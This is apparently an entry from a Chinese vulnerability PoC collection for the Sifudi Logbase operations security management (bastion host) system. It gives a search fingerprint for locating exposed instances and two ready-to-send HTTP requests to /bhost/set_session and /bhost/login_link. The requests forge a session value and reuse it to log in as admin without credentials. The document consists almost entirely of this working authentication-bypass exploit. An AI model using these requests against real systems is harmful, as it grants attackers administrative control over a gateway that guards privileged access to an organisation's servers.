思福迪

目录

• 堡垒机
  • 用户登录poc

堡垒机

title="Logbase运维安全管理系统" && body="bhost"

用户登录poc

POST /bhost/set_session HTTP/1.1
Host: target

u1=admin&m1={"result":true,"info":"123123123","ErrMsg":""}

获取info字段后带入如下请求的 a0 参数值中,uCode参数值为⽤户名：

POST /bhost/login_link HTTP/1.1
Host: target

a0=123123123&a1=&a10=2020-01-01+10:10:10&ha=ABCDDDD11JJJAADDDCCC&uCode=admin&vdcode=